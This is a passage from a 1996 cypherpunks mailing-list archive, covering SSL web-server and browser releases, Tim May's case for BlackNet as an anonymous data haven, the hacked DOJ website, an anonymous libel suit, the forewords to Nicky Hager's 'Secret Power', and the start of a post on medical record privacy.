Dr.Dimitri Vulis KOTM wrote:
> 
> In a lawsuit filed in federal court in New York City, CS First 
> Boston has charged an unknown party with libel ...

Does this mean that *we* don't know who the party is, or that the
party's identity is unknown to everybody?  I'm not exactly sure how
things would work if the latter.

______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Mon, 19 Aug 1996 09:54:46 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION ANNOUNCES STRONGHOLD VERSION 1.3
Message-ID: <199608182350.QAA24313@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - August 19, 1996
Contact: Sameer Parekh 510-986-8770

	       COMMUNITY CONNEXION ANNOUNCES STRONGHOLD
			     VERSION 1.3

Oakland, CA - Community ConneXion, Inc., the leader in uncompromising
security for the Internet, today announced the version 1.3 release of
Stronghold, the commercial version of Apache-SSL. Stronghold is based
on the popular Apache server, the most popular webserver on the
Internet, according to the Netcraft server survey at
http://www.netcraft.com/survey/.

Stronghold 1.3 is a significant improvement from the Stronghold 1.2
product. The latest version is based on Apache 1.1.1, which supports
features such as Keep-Alive, server information modules, a proxy
server, an easier to use API, more flexibility in authentication, and
greater configurability.

"We're happy to have a final release version of 1.3 available," said
Sameer Parekh, President of Community ConneXion. "Because of our close
involvement with the Apache Group, we can quickly track new Apache
releases. We expect to have an Apache 1.2-based server available soon
after the Apache 1.2 release."  Stronghold 1.3 is the result of an
extensive Internet-wide beta test, which started soon after the full
release of Apache 1.1.1.

Apache 1.1.1 includes features such as the status module, which gives
the server administrator the ability to monitor in real time the
server's activity. An information module is also available which gives
administrators easy access to a list of which modules have been
installed on their server, as well as their configuration directives.
The latest version includes modules which support database access,
including mSQL and Postgres95.

Apache 1.1.1 has much more flexible configuration with regards to
virtual hosts and multiple IP addresses. This feature allows such
innovations as the ability within Stronghold 1.3 to serve both SSL and
nonSSL documents from the same server instance.

The latest version of Stronghold supports "Session ID Caching," which
allows for dramatic performance improvements. Session caching allows
servers to process connections much faster because the processor
intensive calculations happen less often. Limited performance tests
have shown speed improvements of eight hundred percent. "With Session
ID Caching, the SSL protocol is not noticably slower than not using
the encryption protocol. There is no excuse not to encrypt
everything," said Parekh.

Community ConneXion is now shipping binaries for Sparc Solaris 2.5,
x86 Solaris 2.5, Sparc SunOS 4.1.3_U1, FreeBSD 2.1, BSDI 1.1, AIX
3.2.5, IRIX 5.3, HP/UX, OSF/1, Ultrix, BSDI 2.0, and Linux (ELF &
a.out). More platforms will be available soon, and even more may be
supported on request.  Stronghold may be ordered and downloaded at
http://www.us.apache-ssl.com/. Existing commercial licensees may
download the latest version free of charge.

Portions developed by the Apache Group, taken with permission from the
Apache Server http://www.apache.org/.  This product includes software
developed by Ben Laurie for use in the Apache-SSL HTTP server project.
This product includes software developed by Eric Young
(eay@mincom.oz.au).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 19 Aug 1996 09:52:30 +0800
To: janke@unixg.ubc.ca
Subject: Re: Final release of Navigator (with strong crypto) now available
In-Reply-To: <321677C2.663B@netscape.com>
Message-ID: <3217ACAE.116D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


janke@unixg.ubc.ca wrote:
> 
> How's that database so that people in Canada can download the
> 128-bit version coming along?

  I believe that we have located a vendor, and are negotiating
terms.  I have not yet received the data.  When everything is in
place I will make an announcement.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 19 Aug 1996 10:05:20 +0800
To: cypherpunks@toad.com
Subject: Why BlackNet *IS* a Data Haven
Message-ID: <ae3cf6e603021004c004@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Jim McCoy and Larry Dettweiler have, in their own ways, raised objections
to my characterization of BlackNet (and that class of mechanisms) as a
distributed, untraceable, robust "data haven."

Without splitting too many semantic hairs about the precise definition of
"data haven," let me examine some ways in which BlackNet behaves
identically to a conventional data haven.

Imagine a piece of data has been outlawed in some jurisdiction. For
simplicity, imagine this to be a book, a text. Let's give it a name, "The
Necronomicon." This "Necronomicon" is contraband, illegal, forbidden,
banned, on The Index in many countries, including the Vatican and the
United States.

(This is just an example. Replace "Necronomicon" with "child porn" for a
more realistic, if distasteful to many, example.)

The classical, Sterling-style "data haven" would have it that this piece of
data, this book, is stored and is available (perhaps for a price) in a
physical site. Maybe Anguilla (thought this is appearing less and less
likely), maybe "The Raft," maybe an orbiting DeathStar, maybe a weather
balloon drifting in the jet stream...

The classical data haven is closely identified with "place." To many
people, they naturally assume "data haven" = a haven for data, a "harbor"
(same IE root as haven) = a physical place.

But is "place" important?

Consider someone in the United States who wants a copy of the Necronomicon.
He can't get it locally, as it is banned. He can try dialing-in or
connecting to a country where it is not banned, but this introduces risks
(as with those who download child porn, arrrange to have it shipped to
them, etc.).

(And the physical jurisdictions which carrry the Necronomicon, or child
porn, or Church of Scientology secrets, etc., will likely be under pressure
to limit or deny access.)

Cryptography offers another way, as it does in so many other areas.

A person in the U.S. seeking the Necronomicon posts a message to BlackNet
(or any similar forum, using the same methods) asking for a copy of it, or
offering to pay for it. (Whether the information is free or for a fee is
not central to the idea.) This request is, of course, untraceable.

Anyone, anywhere in the world, with a copy of this banned material on his
or her private machines may see this request and respond, either giving the
material away, or negotiating a fee. (As I said before, the absence of a
robust digital cash system, bidirectionally untraceable, is a known
limitation of all such systems.)

Thus, it is as if there is a "virtual data haven" (tm), or a "virtual
library," for banned/controversial/etc. materials.

Anyone may "check out" materials by submitting requests (and perhaps paying
a fee). The source of the materials is, of course, unknown. The receiver of
the materials if, of course, unknown.

I call this at least as functional as a "physical data haven," where
someone might physically travel to Anguilla, say, to buy a copy of the
Necronomicon...

...and a whole lot more convenient.

This is, then, my vision of a "distributed, robust, untraceable data haven."

It's a data haven.

And it exists, or at least there are exemplars of it. It's lacking robust
digital money, to keep the transactions untraceable, but it's here.

The Church of Scientology documents essentially exist at this virtual data
haven site. Think about it.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 19 Aug 1996 08:22:01 +0800
To: stephen@iu.net (Stephen Cobb)
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <1.5.4.32.19960818184633.00c0c884@iu.net>
Message-ID: <199608182219.RAA10538@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Stephen Cobb wrote:
> If anyone happens to know which vulnerability(s) this hack exploited I would
> be most grateful if they could let me know, either on the list or privately
> (stephen@iu.net). I am not asking for someone to publish the attack script
> or specifics of what was done to get in, but I would like to know what holes
> were used (e.g. cgi script error).

The more details the better.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Mon, 19 Aug 1996 03:22:31 +0800
To: "'cypherpunks@toad.com>
Subject: Re: Imprisoned Capital
Message-ID: <01BB8D2F.ABBEAD00@groningen12.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain



James A. Donald wrote:

>[In response the argument that attempts to imprison capital will cause 
>capital flight]

>At 10:50 PM 8/16/96 +-200, Bart  Croughs wrote:
>> This is a good point when you talk about governments that will 
>> prevent *all* capital from flowing out. But a government could 
>> prevent the outflow of capital of it's own citizens, and still 
>> allow capital of foreigners to leave the country. As long as 
>> foreign capital isn't imprisoned, foreign capital could be 
>> attracted.

>Been tried.  Does not work.

>1.  If foreign capital is allowed to freely enter and leave, internal
>players find ways to sneak their capital out.  This forces the
>government to start regulating and supervising foreign businessmen
>in ways that at best terrify them (such controls look very much
>like creeping confiscation), and at worst cause them huge harm
>with no real benefits to anyone.

I think you are probably right that *in practice* it will not work when the government tries to prevent domestic capital from flowing out and at the same time will allow capital of foreigners to freely flow in and out. After all, government doesn't work. But this doesn't prove the theoretical case that an outflow of capital wouldn't hurt the standard of living of workers in a country. As long as this isn't proven, governments have an excuse to try again and impose controls on capital (and this time of course, they will do it better...)

Bart Croughs




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Mon, 19 Aug 1996 03:06:30 +0800
To: "'cypherpunks@toad.com>
Subject: Re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB8D2F.B10B2EA0@groningen12.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain




Mike McNally wrote:

>Bart Croughs wrote:

>> ... better arguments (after reading the books I suggested)

>Like what is it with you and these books?  Is "Austrian" a code word
>for "Divine omniscient extraterrestrial super-being"?

No, but a number of posters claimed they were Austrians, and among them was Timothy May. So if I can show that Timothy's statements contradict the economic theories he says he supports on the most fundamental level (the level of methodology), then I have a pretty solid case that he is a bit confused and that he should do his homework better before he continues arguing. Unless of course he can show the Austrians (or me) to be wrong; but he hasn't done this yet.

      >Through all this sophist gibberish I've completely lost track of
      >what exactly it is you're trying to say.

I don't blame you when you get the impression that Austrian methodology, compressed in a couple of sentences, is sophist gibberish. Without the proper background knowledge, this is probably unavoidable; methodology is a rather difficult subject. But if you are really interested and want to know more about it, you now know where to look...

Bart Croughs




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 19 Aug 1996 12:04:32 +0800
To: cypherpunks@toad.com
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <32167A0C.473C@tivoli.com>
Message-ID: <199608190146.SAA19133@fat.doobie.com>
MIME-Version: 1.0
Content-Type: text/plain


> CNN online (http://www.cnn.com) is reporting a "breakin" by "hackers"
> to the DOJ web site.  They don't elaborate exactly how thy did it.

Did anyone save a copy of the altered web page?  I would like to see
what the crackers did.

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Roger Healy OBC)
Date: Mon, 19 Aug 1996 12:30:51 +0800
To: jsw@netscape.com
Subject: Re: Final release of Navigator (with strong crypto) now available
In-Reply-To: <3217A9EE.3F6B@netscape.com>
Message-ID: <199608190211.TAA02034@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> > > > Jeff Weinstein (jsw@netscape.com) wrote:
> > > >
> > > > : The final release of Navigator 3.0, complete with non-exportable
> > > > : strong crypto, is now available for download by US citizens.  Note
> > > > : that this is the released version of 3.0, so it will not expire.
> > > > : You can get it from:
> > > >
> > > > Would it be possible to both supply an Linux ELF and a.out binary ?
> > >
> > >   No, we will only be supplying ELF.  Since linux is not officially
> > > supported, we really don't have the resources to do multiple versions.
> > 
> > ELF is cool.  What about BSD?  I've seen how you support BSDI so the
> > binary should work with FreeBSD or NetBSD.?
> 
>   I'm not quite sure what the question is here.

Your old version supported BSDI.  Will the new 128bit version support 
BSDI in ELF or a.out?

> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw


--
Love,
Qut@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Roger Healy OBC)
Date: Mon, 19 Aug 1996 12:12:38 +0800
To: scraver@mnet.fr (Arnauld Dravet)
Subject: Re: Netscape under Linux (Vs microsoft)
In-Reply-To: <32173372.25BEFC52@mnet.fr>
Message-ID: <199608190219.TAA03733@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> > > Would it be possible to both supply an Linux ELF and a.out binary ?
> > 
> >   No, we will only be supplying ELF.  Since linux is not officially
> > supported, we really don't have the resources to do multiple versions.
> 
> yesterday i was in #linux on irc , and several pplreports some bugs with
> netscape under linux.i got some too many times a day... Netscape crashes
> when i try to load some HTML pages...i assume it shouldn't and we got
> ansolutly no probs with Netscape under windows.
> SO we just wondered if it's not a kind of support to micro$oft.
> Maybe Linux is 'not officially supported', but have to know unix is the
> most used OS, and that since Linux is free, many people use it. So when
> will you accept to recognize Linux as an entire OS ?? i just reinstalled
> Windows95 on a HD yesterday and it has already crached 2x. Windows is
> expensive and it crashes. Why should we pay for a fucked 'OS' ?

No shit.  I was thrilled to watch the entire disk overwritten by unix.  
Everthing which came with the system was boring and useless.  Gimmee BSD 
anyday, a socialist operating system


--
Love, Qut OBC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Roger Healy OBC)
Date: Mon, 19 Aug 1996 12:17:18 +0800
To: cypherpunks@toad.com
Subject: Whereis is the shell scsh?
Message-ID: <199608190221.TAA04183@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes, I printed and skimmed through the Secure Shell FAQ.  Is there a 
version for csh instead of sh?


--
OBC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Sun, 18 Aug 1996 22:31:56 +0800
To: cypherpunks@toad.com
Subject: _Secret Power_ (re: "world communications being monitored")
Message-ID: <199608180827.UAA07333@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


Forewords from Nicky Hager's book _Secret Power_:


Once upon a time life was easy for the intelligence community.
   Michael Joeseph Savage made a mark in the sands of history with his
`where Britain stands we stand' declaration.  It was only right that
we saw the world through British eyes and, when Britain retreated,
only sensible that we should go all the way with LBJ as an Australian
Prime Minister (in whose memory a swimming pool in Melbourne was
named) once declared.  The cold war kept us in line and on line.
   In the mid-1980s we bucked the system.  We may have been ahead of
our time on matters nuclear, but we were out of step with what was
called the `Western Alliance'.  It took a break with the United States
and Britain to make the people of New Zealand aware that we were part
of an international intelligence organisation which had its roots in a
different world order and which could command compliance from us while
withholding from us the benefits of others' intelligence.
   Life at the time was full of unpleasant surprises.  State-sponsored
terrorism was a crime against humanity as long as it wasn't being
practiced by the allies, when it was studiously ignored.  In the
national interest it became necessary to say `ouch' and frown and bear
certain reprisals of our intelligence partners.  We even went the
length of building a satellite station at Waihopai.  But it was not
until I read this book that I had any idea that we had been committed
to an international integrated electronic network.
   It was with some apprehension that I learned Nicky Hager was
researching the activity of our intelligence community.  He has long
been a pain in the establishment's neck.  Unfortunately for the
establishment, he is engaging, thorough, unthreatening, with a
dangerously ingenuous appearance, and an atonishing number of people
have told him things that I, as Prime Minister in charge of the
intelligence services, was never told.
   There are also many things with which I am familiar.  I couldn't
tell him which was which.  Nor can I tell you.  But it is an outrage
that I and other ministers were told so little, and this raises the
question of to whom those concerned saw themselves ultimately
anwserable.
   It also raises the question as to why we persist with the old order
of things.  New Zealand doesn't have much in common with Major's
Britain and probably less with Blair's Britain.  Are we
philosophically in tune with Clinton's USA?  Is he?
   Does all of that prejudice our new orientation to Asia?
   There will be two responses to this book.  One will take the easy
course of dumping on Hager.  He is quite small and can easily be
dumped on.  The other will be to challenge the existing assumptions
and to have a rational debate on security and intelligence.  I have
always enjoyed taking the easier course but we may have been the
poorer for it.


                                                           David Lange
                                 Prime Minister of New Zealand 1984-89



                  -------------------------------------


The world of signals intelligence is one that governments have
traditionally tried to keep hidden from public view.  The secrecy
attached to it by the United Kingdom and its allies in the Second
World War, particularly codebreaking operations, carried over into the
Cold War.  Whether their adversaries were attacking them with weapons
or diplomatic strategies, the concern was the same --- that
revelations about methods and successes would lead an adversary to
change codes and ciphers and deny the codebreaker the ability to read
the foe's secret communications.
   Another aspect of the Second World War that carried over into the
Cold War era was the close co-operation between five countries --- the
United States, the United Kingdom, Canada, Australia and New Zealand
--- formalised with the UKUSA Security Agreement on 1948.  Although
the treaty has never been made public, it has become clear that it not
only provided for a division of collection tasks and sharing of the
product, but for common guidelines for the classification and
protection of the intelligence collected as well as for personal
security.
   But over the last 50 years, codebreaking has become far more
difficult, and often impossible --- due to the use of computer based
encryption.  At the same time, the interception of unencrypted
communications (for example, air-to-ground communications) and other
electronic signals --- particularly radar emanations and missile
telemetry --- has grown dramatically in importance.  This expanded
role for signals intelligence was made evident in the construction and
operation of a vast networkof ground stations spread across the world,
aircraft equipped with intercept antenna patrolling the skies (and
sometimes being shot down), and eventually the launch of eavesdropping
satellites.  This activity did not escape the notice of the Soviet
Union, which also was busy establishing its own elaborate network.  It
also became very evident to outsider observers that signals
intelligence was an important and very expensive part of the Cold War.
   That signals intelligence became more noticeable did not, for many
years, alter the attitudes of the authorities about the necessity for
strict secrecy.  In the United States, the National Security Agency,
established in 1952, was officially acknowledged only in 1957.  For
years, what were well known to be US operated signals intelligence
stations have been officially described as facilities engaged in the
research of `electronic phenomena' or the `rapid-relay of
communications.'  It took the US over 20 years after the Soviet Union
obtained detailed information on a US signals intelligence satellite
even to acknowledge the existance of such satellites.  Other nations
have been equally reticent --- the very existance of Canada's
Communications Security Establishment was first revealed by the media
in 1975.
   In recent years some of the UKUSA governments have been somewhat
more forthcoming about signals intelligence sometimes with regard to
historical events, sometimes with respect to organisation structure,
and sometimes about some aspect of current operations.  But secrecy is
still intense (although no more than in other countries).  What the
public does know, it knows largely because of the efforts of
industrious researchers who have collected and analysed obscure
documents and media accounts, and interviewed present and former
intelligence officers who can shed light on signals intelligence
operations.  These researchers have included Desmond Ball in
Australia, James Bamford in the United States and Duncan Campbell in
the United Kingdom.
   Nicky Hager's _Secret Power_ earns him a place in that select
company.  Indeed, he has produced the most detailed and up-to-date
account in existance of the work of any signals intelligence agency.
His exposé of the organisation and operations of New Zealand's
Government Communications Security Bureau (GCSB) is a masterpiece of
investigative reporting and provides a wealth of information.
   The reader of Mr Hager's book will learn about not just New
Zealand's signals intelligence activities, but those of its partners.
Specifically, the reader will learn about the origins, the evolution,
and internal structure of the GCSB; the Tangimoana and Waihopai ground
stations and their operations; New Zealand's role in the UKUSA
alliance, and some of the signals intelligence operations of the other
UKUSA nations.  _Secret Power_ also serves as a fascinating case study
of the role of a junior partner in an intelligence alliance.
   Some, undoubtedly, will object to the unprecendented detail to be
found in the book, taking the traditional view that secrecy is far
more important than public understanding of how tax dollars are being
spent on intelligence.  Certainly, revelations that defeat the purpose
of legitimate intelligence activities are unfortunate and waste those
tax dollars.  But the UKUSA governments and their intelligence
services have been far too slow in declassifying information that no
longer needs to be secret and far too willing to classify information
that need not be restricted.  A Canadian newspaper made the point
rather dramatically a few years ago --- after being denied access to a
Canadian signals intelligence facility, the paper promptly purchased
on the open market, and published, a satellite photograph of the
facility, and its antenna system, first obtained by a Soviet spy
satellite.
   There are many individuals within the services who would prefer
greater openness, but they frequently cannot overcome the intense
opposition of those preaching the need for tight secrecy.  The
internal bureaucratic battle to get information declassified can be a
long and intense one and those opposing disclosure have an advantage
--- often they are those in charge of security, who have developed a
mindset which views any revelation as damaging.  In the meantime, the
public is kept in the dark.  A free press, as manifested in books such
as Mr Hager's, is large step towards alleviating the problem.


                                                  Jeffrey T. Richelson
                                                  Alexandria, Virginia
                                                             May, 1996


  Jeffrey Richelson is a leading authority on United States
  intelligence agencies and author of _America's Secret Eyes in the
  Sky_ and co-author of _The Ties That Bind_.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 19 Aug 1996 15:16:45 +0800
To: "cypherpunks" <blane@aa.net>
Subject: Re: Orbiting Datahavens
Message-ID: <19960819050233078.AAA175@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996 17:06:47 -0700 (PDT), Brian Lane wrote:
>> 	I'm not sure who would launch it - a Japanese launcher? (ESA is
>> strapped for cash, which was one reason for the phenomenaly stupid move of
>> putting space probes onto the maiden flight of the Ariane 5.)
>
>  We'd want someone more reliable than ESA! I doubt that we could afford
>to have a backup satellite in case of a disaster. Once the Delta Clipper
>is functional the payload costs to orbit is supposed to drop tremendously.

Or, who knows. NASA could finally wake up, really that the shuttle sucks
as a cargo hauler, start using something like the Phoenix (They
stonewalled it - would have made them look bad) to build orbital industry
and then setup giant solar-powered launch lasers and have surface to
orbit at pennies per pound.  Oh well...  Who'd have thought we'd go to
the moon and stop.

| Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
| http://www.io-online.com/adamsc/adamsc.htp
| Autoresponder: send email w/subject of "send resume" or "send PGPKEY"

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Mon, 19 Aug 1996 14:28:51 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why BlackNet *IS* a Data Haven
In-Reply-To: <ae3cf6e603021004c004@[205.199.118.202]>
Message-ID: <Pine.GUL.3.95.960818211954.27653A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

True, for controversial political and artistic materials whose
authors/distributors have an interest in disseminating.

However, with neither a government to enforce contracts nor an identifiable
location/identity that can be used for the private enforcement of, ahem,
contracts, the barrier to entry for anonymous markets in real commercial
products seems rather high. How are buyers and sellers to trust each other?
How do you build reputation capital from zero? Once you have reputation,
transaction costs should be pretty low, but building it?

If what you're selling is a physical product, you're ultimately going to
have a location. If what you're selling is information, how do you
demonstrate the worth and trustworthiness of your data without distributing
it? And once you have distributed it, what's to stop a "counterfeiter" from
redistributing it, stealing your profits before you have had a chance to
establish your reputation capital as the preferred source?

I don't see anonymous digital cash as the tightest bottleneck. Distributed
trust in an anonymous marketplace seems more difficult.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMhftl5NcNyVVy0jxAQFJNQH/XaNdrku42unvP56Dku+QhPwWged5Qbdw
9wLcrwuSbBLeJg0lgsjN33oXMTTQUWV7JtY8hEhh0zS7WuWcEi5S8A==
=oiuA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 19 Aug 1996 14:52:38 +0800
To: cypherpunks@toad.com
Subject: Re: Why BlackNet *IS* a Data Haven
Message-ID: <ae3d3dfe080210047546@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:29 AM 8/19/96, Rich Graves wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>True, for controversial political and artistic materials whose
>authors/distributors have an interest in disseminating.

And artistic, political, cultural, etc. materials are of course one of the
main markets, as the large number of bookstores shows. (And the success of
"Primary Colors," by "Anonymous," shows that one need not the True Name of
an author, obvious to all persons on this list.)

>However, with neither a government to enforce contracts nor an identifiable
>location/identity that can be used for the private enforcement of, ahem,
>contracts, the barrier to entry for anonymous markets in real commercial
>products seems rather high. How are buyers and sellers to trust each other?
>How do you build reputation capital from zero? Once you have reputation,
>transaction costs should be pretty low, but building it?

Yes, a topic we've discussed many times over the years. I don't have the
time to compose a new essay on this, so I'll refer folks to either the
archives or my Cyphernomicon FAQ, which discusses reputations, third party
escrow services, etc.

(Imagine an equally anonymous "Ace Escrow Service," which holds the cash
until a product is transferred. Essentially, this is what a _store_ does.
For example, a Barnes and Noble or a Home Depot chooses which products to
stock based on their own evaluations, tests, and reputation
assessments...and they make good on defective products, etc. This lessens
the risks to the consumer that he will be screwed by a vendor he has little
recourse against. "Middlemen.")

>If what you're selling is a physical product, you're ultimately going to
>have a location. If what you're selling is information, how do you
>demonstrate the worth and trustworthiness of your data without distributing
>it? And once you have distributed it, what's to stop a "counterfeiter" from
>redistributing it, stealing your profits before you have had a chance to
>establish your reputation capital as the preferred source?

Sure, these are all issues. (As the Assyrian merchant said in 1300 B.C.
"This idea of a "store" you have...I can think of many problems. How will
they all be solved?")

>I don't see anonymous digital cash as the tightest bottleneck. Distributed
>trust in an anonymous marketplace seems more difficult.

I disagree, but this was obvious from the focus of my post. I believe we
see "distributed trust" (though this is not the choice of words I would
use) all around us.

Too many issues to debate here.

My point was that the BlackNet approach *is* like a physical data haven,
except with some advantages.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy <carleens@net-link.net>
Date: Mon, 19 Aug 1996 12:02:42 +0800
To: cypherpunks@toad.com
Subject: MSIE 128 bit version
Message-ID: <1.5.4.32.19960819015832.0066eed4@serv01.net-link.net>
MIME-Version: 1.0
Content-Type: text/plain


                -----BEGIN PGP SIGNED MESSAGE-----

I know this topic has been covered before, but could somebody point me to
MSIE's 128 bit version?  Thanks.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhfJNtZDmDuLFgC9AQEdgwP+MjfLcs+KiZkMg/MIR0Hp+Gz6ksgjRSvL
D2NS3k3zzPNqj316Kod0/i8p+rNoWcWJ08aQRsykni1mPSkhPSxCVgEbSRv/eb+g
3ePKekPhZEaXWQDskcQ1yw4rC7meqQqKF2R1nwrohzQvX369hGsrg1xxP0jlvBuF
nrrUeP3Sg4E=
=d3S9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Mon, 19 Aug 1996 15:01:16 +0800
To: nobody@huge.cajones.com (Huge Cajones Remailer)
Subject: Re: Hackers invade DOJ web site
In-Reply-To: <199608190146.SAA19133@fat.doobie.com>
Message-ID: <199608190501.WAA01334@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> > CNN online (http://www.cnn.com) is reporting a "breakin" by "hackers"
> > to the DOJ web site.  They don't elaborate exactly how thy did it.
> 
> Did anyone save a copy of the altered web page?  I would like to see
> what the crackers did.

		  http://www.otol.fi/~jukkao/usdoj/

I think that a lot of what the freedom hacker was trying to say got
lost due to some of the pictures he included. His alterations to the
battered women's page are not going to win him any points with me or
anyone else. Nor is his "Kill the Nigs" version of clinton's
speach. Neither is particularly humerous or has anything to do with
our diminishing rights. In fact, the whole thing is more likely to
backfire then it is to do any good.

So Mr. Freedom Hacker, wherever you are out there, if you ever get a
chance to do it again, here is a little advice to you. 1) pick a
single point or common theme. 2) do not alienate 60% of your audience
in the process 3) try to be more professional and 4) let whoever did
the caption for george washington write the rest of it.

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 19 Aug 1996 15:09:25 +0800
To: cypherpunks@toad.com
Subject: Re: CS First Boston lawsuit
Message-ID: <ae3d43f90a021004dcf8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:29 AM 8/19/96, Alan Horowitz wrote:
>I suspect they are trying to get a judgement against "John Doe", in the
>hopes of tracking him down later.
>
>Actually, if I had a sizeable judgement against such a John Doe, I could
>probably find a private detective who would find the dude for a
>contingent fee. Wow, a whole new class of factoring (commerce definition)
>opens up. Get me a lawyer....

Lawyers out there can and should correct me if I'm wrong, but I don't
believe either the criminal or civil justice system has the concept of a
"John Doe" trial! The ability to have the advice of an attorney, to
confront one's accusers, cross-examine witnesses, and mount a defense, and
all that constitutional stuff. Rather hard to do if the trial is in the
past tense.

Can you cite an example of such a "John Doe" trial in the U.S.?

(There may be trials "in absentia," more so in other countries than in the
U.S., but not when no persons have been identified at all!)


--Tim May, who hopes he is never identified as the "John Doe" indicted,
tried, convicted, and sentenced in 1979 in Washington County, Oregon, for
the crime of unlawful foddering in a public place.

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 19 Aug 1996 15:50:31 +0800
To: cypherpunks@toad.com
Subject: Re: "Utilization Review"
Message-ID: <ae3d463d0b0210046542@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:22 AM 8/19/96, Black Unicorn wrote:
>I listened with horror this evening to a radio program which
>discussed the state of medical record privacy today.
>
>In one segment a doctor (psychologist) described an experience
>she had after a session which was covered by the patient's
>insurance plan.

A friend of mine is a psychotherapist very concerned with such issues.
There are many pressures on him to reveal information about patients, most
of which are "unsurprising" in a world of what can only be called
"socialized medicine."

(I say "socialized" in that very few persons pay cash or their own money
for medical care, psychiatric treatment, sports injury therapy, etc. Most
are paying only a per-visit deductible, if even that, and the rest of the
charges are picked up by their employers, their insurance plans through
employers, the various social welfare institutions, etc.)

Insurance companies want proof that the treatments are needed, or are
working, and cannot merely take the word of a shrink, for example, that his
